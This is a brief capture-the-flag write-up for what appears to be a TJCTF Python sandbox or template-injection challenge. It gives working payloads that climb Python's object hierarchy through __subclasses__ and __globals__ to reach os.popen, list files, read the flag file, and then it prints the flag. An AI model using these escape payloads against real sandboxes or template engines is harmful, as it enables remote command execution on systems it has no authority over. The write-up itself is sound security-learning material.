Rating:
Some blacklisted items here but its essentially a SSTI sort of. I tried a basic payload.
`print(''.__class__.__mro__[1].__subclasses__())`
4th last item is my [favourite](https://blog.p6.is/Python-SSTI-exploitable-classes/#Using-os-wrap-close).
`print(''.__class__.__mro__[1].__subclasses__()[-4].__init__.__globals__['sys'].modules['os'].popen('ls').read())`
`print(''.__class__.__mro__[1].__subclasses__()[-4].__init__.__globals__['sys'].modules['os'].popen('cat flag-cce1c56d-466d-4af9-8ae7-c7bcf99d5c49.txt').read())`
Flag: `tjctf{oops_bad_filter_3b582f74}`